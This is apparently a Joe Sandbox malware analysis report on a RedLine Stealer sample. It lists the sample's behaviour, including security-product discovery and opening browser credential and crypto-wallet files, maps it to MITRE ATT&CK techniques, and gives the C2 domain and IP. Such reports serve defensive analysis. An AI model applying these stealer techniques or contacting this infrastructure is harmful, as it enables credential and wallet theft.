                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.44bdb88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.43f05b0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.JEPayKhzWa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.43f05b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 4680, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 7024, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 4680, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Crypto Currency WalletsShow sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 4680, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.44bdb88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.44bdb88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.43f05b0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.JEPayKhzWa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JEPayKhzWa.exe.43f05b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 4680, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 7024, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: JEPayKhzWa.exe PID: 4680, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection111Masquerading1OS Credential Dumping1Security Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery11Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion231Security Account ManagerVirtualization/Sandbox Evasion231SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSystem Information Discovery123VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    JEPayKhzWa.exe60%VirustotalBrowse
                    JEPayKhzWa.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    4.2.JEPayKhzWa.exe.400000.0.unpack100%AviraHEUR/AGEN.1140572Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    kurinogti.info9%VirustotalBrowse
                    api.ip.sb2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://kurinogti.info:80/9%VirustotalBrowse
                    http://kurinogti.info:80/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    http://tempuri.org/2%VirustotalBrowse
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    http://tempuri.org/00%Avira URL Cloudsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsP0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://helpx.ad0%URL Reputationsafe
                    https://helpx.ad0%URL Reputationsafe
                    https://helpx.ad0%URL Reputationsafe
                    https://api.ip.sb46k0%Avira URL Cloudsafe
                    http://kurinogti.info/0%Avira URL Cloudsafe
                    http://tempuri.org/ewP0%Avira URL Cloudsafe
                    https://get.adob0%URL Reputationsafe
                    https://get.adob0%URL Reputationsafe
                    https://get.adob0%URL Reputationsafe
                    http://kurinogti.info0%Avira URL Cloudsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                    http://kurinogti.info46kt0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    kurinogti.info
                    45.139.184.124
                    truetrueunknown
                    api.ip.sb
                    unknown
                    unknownfalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://kurinogti.info/true
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabJEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                      high
                      http://service.rJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://kurinogti.info:80/JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmptrue
                      • 9%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                        high
                        https://support.google.com/chrome/?p=plugin_wmpJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                          high
                          https://support.google.com/chrome/answer/6258784JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                            high
                            https://api.ip.sb/geoipJEPayKhzWa.exefalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/soap/envelope/JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpfalse
                              high
                              https://support.google.com/chrome/?p=plugin_flashJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/envelope/DJEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpfalse
                                  high
                                  http://tempuri.org/JEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.google.com/chrome/?p=plugin_javaJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                    high
                                    http://tempuri.org/Endpoint/VerifyUpdateResponseJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://go.microsJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://tempuri.org/Endpoint/SetEnvironmentJEPayKhzWa.exe, 00000004.00000002.713802431.000000000333F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://tempuri.org/Endpoint/SetEnvironmentResponseJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://tempuri.org/Endpoint/GetUpdatesJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.google.com/chrome/?p=plugin_realJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                      high
                                      https://api.ipify.orgJEPayKhzWa.exefalse
                                        high
                                        https://api.ipify.orgcookies//settinString.RemovegJEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.interoperabilitybridges.com/wmp-extension-for-chromeJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://support.google.com/chrome/?p=plugin_pdfJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                            high
                                            https://support.google.com/chrome/?p=plugin_divxJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                              high
                                              http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                high
                                                http://tempuri.org/Endpoint/VerifyUpdateJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://tempuri.org/0JEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://forms.real.com/real/realone/download.html?type=rpsp_usJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://support.aJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/Endpoint/EnvironmentSettingsPJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ipinfo.io/ip%appdata%JEPayKhzWa.exe, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpfalse
                                                      high
                                                      http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://support.google.com/chrome/?p=plugin_quicktimeJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.datacontract.org/2004/07/JEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.ip.sb/geoip%USERPEnvironmentROFILE%JEPayKhzWa.exe, 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://helpx.adJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                                high
                                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchJEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                                  high
                                                                  https://api.ip.sb46kJEPayKhzWa.exe, 00000004.00000002.713481969.00000000031FC000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://tempuri.org/ewPJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://get.adobJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://ac.ecosia.org/autocomplete?q=JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                                    high
                                                                    http://kurinogti.infoJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://service.real.com/realplayer/security/02062012_player/en/JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://support.google.com/chrome/?p=plugin_shockwaveJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmp, JEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://forms.reaJEPayKhzWa.exe, 00000004.00000002.714132894.0000000003536000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Endpoint/GetUpdatesResponseJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://kurinogti.info46ktJEPayKhzWa.exe, 00000004.00000002.713591036.0000000003240000.00000004.00000001.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponseJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/soap/actor/nextJEPayKhzWa.exe, 00000004.00000002.713421106.00000000031B1000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JEPayKhzWa.exe, 00000004.00000002.723399580.0000000008401000.00000004.00000001.sdmp, tmp47EE.tmp.4.drfalse
                                                                                high

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                45.139.184.124
                                                                                kurinogti.infoRussian Federation
                                                                                59504HostingvpsvilleruRUtrue

                                                                                General Information

                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                Analysis ID:452458
                                                                                Start date:22.07.2021
                                                                                Start time:11:42:12
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 9m 2s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:JEPayKhzWa (renamed file extension from none to exe)
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:16
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@6/25@5/1
                                                                                EGA Information:Failed
                                                                                HDC Information:Failed
                                                                                HCA Information:
                                                                                • Successful, ratio: 98%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Stop behavior analysis, all processes terminated
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                • TCP Packets have been reduced to 100
                                                                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 20.82.210.154, 104.26.13.31, 172.67.75.172, 104.26.12.31, 13.88.21.125, 52.255.188.83, 20.54.110.249, 40.112.88.60, 131.253.33.200, 13.107.22.200, 80.67.82.235, 80.67.82.211
                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, skypedataprdcolwus17.cloudapp.net, api.ip.sb.cdn.cloudflare.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, skypedataprdcoleus17.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                11:43:24API Interceptor64x Sleep call for process: JEPayKhzWa.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                45.139.184.124loLFGlMXdz.exeGet hashmaliciousBrowse
                                                                                • kurinogti.info/
                                                                                Q54JbvBq3c.exeGet hashmaliciousBrowse
                                                                                • tstamore.info/
                                                                                6a976e219af2974ee4d7c7986ba0bf300ab4315a91814.exeGet hashmaliciousBrowse
                                                                                • whatareyousayblog.info/
                                                                                nO928Cerv8.exeGet hashmaliciousBrowse
                                                                                • kurinogti.info/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                kurinogti.infoloLFGlMXdz.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                nO928Cerv8.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                HostingvpsvilleruRUxAC6nZjT3T.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                Cx9ER7vYGi.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                8.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                loLFGlMXdz.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                Q54JbvBq3c.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                xBMx9OBP97.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                sonia_5.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                hgfBjr06yH.exeGet hashmaliciousBrowse
                                                                                • 185.230.143.117
                                                                                6a976e219af2974ee4d7c7986ba0bf300ab4315a91814.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                nO928Cerv8.exeGet hashmaliciousBrowse
                                                                                • 45.139.184.124
                                                                                Payment-SI-T2-068837-AND-SI-T2-068858.xlsxGet hashmaliciousBrowse
                                                                                • 45.139.186.135
                                                                                g7hoEtBkoZ.exeGet hashmaliciousBrowse
                                                                                • 45.139.186.135
                                                                                Payment -SI-T2-068837 AND SI-T2-068858.xlsxGet hashmaliciousBrowse
                                                                                • 45.139.186.135
                                                                                rBC66jAMC8.exeGet hashmaliciousBrowse
                                                                                • 45.139.186.135
                                                                                Kv6wO46d8e.exeGet hashmaliciousBrowse
                                                                                • 45.139.187.152
                                                                                lErGFmfS65.exeGet hashmaliciousBrowse
                                                                                • 45.139.187.152
                                                                                0VGFGZpQj0.exeGet hashmaliciousBrowse
                                                                                • 45.139.187.152
                                                                                YOhPerTWeQ.exeGet hashmaliciousBrowse
                                                                                • 45.139.187.152
                                                                                3YFLebh8tM.exeGet hashmaliciousBrowse
